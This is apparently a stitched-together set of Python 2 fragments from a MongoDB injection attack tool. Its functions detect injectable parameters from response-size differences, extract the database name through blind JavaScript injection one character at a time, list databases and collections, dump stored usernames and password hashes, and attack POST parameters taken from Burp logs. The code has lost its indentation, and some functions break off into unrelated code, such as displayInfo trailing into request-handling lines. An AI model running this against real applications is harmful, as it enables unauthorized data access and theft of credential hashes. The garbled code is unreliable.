def checkResult(baseSize, injectSize, testNum, postData):
global validAddrs #有效
global possAddrs
global httpMethod
global neDict
global gtDict
delta = abs(baseSize - injectSize)
if (delta >= 100) and (injectSize != 0):
printInfoMsg(
'[*] Response varied %s bytes from random parameter value! Injection works!'
% delta)
if httpMethod == 'GET':
validAddrs.append(urlArray[testNum])
else:
if testNum == 1:
validAddrs.append(str(neDict))
elif testNum == 2:
validAddrs.append(str(gtDict))
else:
validAddrs.append(str(postData))
if testNum == 2 or testNum == 4:
lt24 = True
str24 = True
elif testNum == 3 or testNum == 5:
lt24 = True
int24 = True
return
elif (delta < 100) and (delta > 0) and (injectSize != 0):
print '[*] Response variance was only %s bytes. Injection returned a MongoDB Error. Injection may be possible.' % delta
if httpMethod == 'GET':
possAddrs.append(urlArray[testNum])
else:
if testNum == 1:
possAddrs.append(str(neDict))
else:
possAddrs.append(str(postData))
return
elif delta == 0:
print '[*] Injection did not work.'
return
else:
print '[*] Injected response was smaller than random response. Injection may be possible.'
if httpMethod == 'GET':
possAddrs.append(urlArray[testNum])
else:
if testNum == 1:
possAddrs.append(str(neDict))
else:
possAddrs.append(str(postData))
return
def displayDBS(conn):
try:
printInfoMsg('[+] List of databases:')
for db in conn.database_names():
print ' %s' % db
print '\n'
except:
printErrMsg('[Error] Couldn\'t list databases.')
try:
for dbname in conn.database_names():
db = conn[dbname]
printInfoMsg('[+] DBname: %s' % dbname)
colls = db.collection_names(include_system_collections=False)
printInfoMsg('[+] %s Collections:' % dbname)
for coll in colls:
print ' %s' % coll
print '\n'
if 'system.users' in db.collection_names():
users = list(db.system.users.find())
printInfoMsg('[+] Database User and Password hash:')
try:
for x in range(0, len(users)):
print " Username: "******" Hash: " + users[x]['pwd']
print "\n"
except Exception, e:
printErrMsg('[Error] %s, couldn\'t list user or hash\n' %
e)
continue
except Exception, e:
printErrMsg('[Error] %s, Couldn\'t list collections.\n' % e)
def getDBInfo():
getDBnameLen = False
getDBname = False
DBnameLen = 0
nameCount = 0
charCount = 0
dbName = ''
chars = string.ascii_letters + string.digits
trueUrl = urlArray[11].replace("---", "return true; var v ='!" + "&")
req = requests.get(urlArray[11], headers=HEADERS)
baseLen = int(len(req.content))
print '[*] Calculating the length of the database name.'
while getDBnameLen == False:
calcUrl = urlArray[11].replace(
"---",
"if(db.getName().length==%s) {return true;} var v='a&" % DBnameLen)
req = requests.get(calcUrl)
UrlLen = int(len(req.content))
if UrlLen == baseLen:
print '[*] Got database name length of %s characters.' % DBnameLen
getDBnameLen = True
else:
DBnameLen += 1
printInfoMsg('[+] Database name is: '),
while getDBname == False:
calcUrl = urlArray[11].replace(
"---", "if(db.getName()[%s]==chars[%s]){return true;} var v='a&" %
(nameCount, charCount))
req = requests.get(calcUrl)
UrlLen = int(len(req.content))
if UrlLen == baseLen:
dbName += chars[charCount]
print dbName,
nameCount += 1
charCount = 0
if nameCount == DBnameLen:
getDBname = True
else:
charCount += 1
def postWeb(reqFile):
print '[*] Start web app attacks (POST)'
global testNum
testNum = 1
global httpMethod
httpMethod = 'POST'
global possAddrs
possAddrs = []
global validAddrs
validAddrs = []
global addedTarget
addedTarget = dict()
global paramNames
paramNames = []
global paramValues
paramValues = []
appUp = False
strAttack = False
intAttack = False
checkFile(reqFile)
try:
with openFile(reqFile, 'rb') as f:
content = f.read()
except:
printErrMsg(
'[Error] Something went wrong while trying to read the content of file \'%s\''
% reqFile)
return
parseBurpLog(content)
if not addedTarget['url'] or not addedTarget['data']:
printErrMsg(
'[Error] Unable to find usable request(s), in provided file (\'%s\')'
% reqFile)
return
print '[*] Testing connection to the target URL.'
url = addedTarget['url']
buildPostdata(url, addedTarget['data'])
printInfoMsg('[+] Valid URLs:')
for url in validAddrs:
printInfoMsg(' %s' % url)
print '\n '
printInfoMsg('[+] Possible URLs:')
for url in possAddrs:
printInfoMsg(' %s' % url)
def buildUrl(url, value):
global urlArray
urlArray = ['', '', '', '', '', '', '', '', '', '', '', '']
paramNames = []
paramValues = []
injectParams = []
try:
split_url = url.split('?')
params = split_url[1].split('&')
except:
printErrMsg(
'[Error] Not able to parse the URL and parameters. Check the url')
return
for item in params:
index = item.find('=')
paramNames.append(item[0:index])
paramValues.append(item[index + 1:len(item)])
printInfoMsg('[+] List of parameters:')
index = 1
for name in paramNames:
print ' [%s] %s' % (index, name)
index += 1
try:
injectIndex = getQuesMsg(
'[*] Choose parmeters to inject (such as 1,2,3):')
#print injectIndex.split(',')
for i in injectIndex.split(','):
injectParams.append(paramNames[int(i) - 1])
except Exception, e:
printErrMsg('[Error] %s. Somthing wrong... Check inject parmeters.' %
e)
return
def displayInfo(conn):
printInfoMsg('[+] Server Info:')
print ' MongoDB Version:', conn.server_info()['version']
print ' Debugs enabled:', str(conn.server_info()['debug'])
print ' Platform:', str(conn.server_info()['bits']) + ' bits'
print '\n'
reqTime = round((end - start), 3)
print '[*] App is up, got response length of %s' % resLength
else:
printErrMsg('[Error] Got %s from the app, check your options.' %
req.status_code)
return
except Exception, e:
printErrMsg(
'[Error] %s. Looks like the server didn\'t respond. Check your options.'
% e)
return
if appUp == True:
index = 1
printInfoMsg('[+] List of post params:')
for params in postParams:
print ' [%s] %s' % (index, params)
index += 1
try:
injectIndex = getQuesMsg('Choose a parmeter to inject: ')
injOpt = postParams.keys()[int(injectIndex) - 1]
except Exception, e:
printErrMsg(
'[Error] %s. Somthing wrong... Check inject parmeters.' % e)
return
injectSize = getQuesMsg('[*] Input test random string size: ')
injectstr = getInjectStr(int(injectSize))
postParams[injOpt] = injectstr
req = requests.post(url, data=postParams, headers=HEADERS)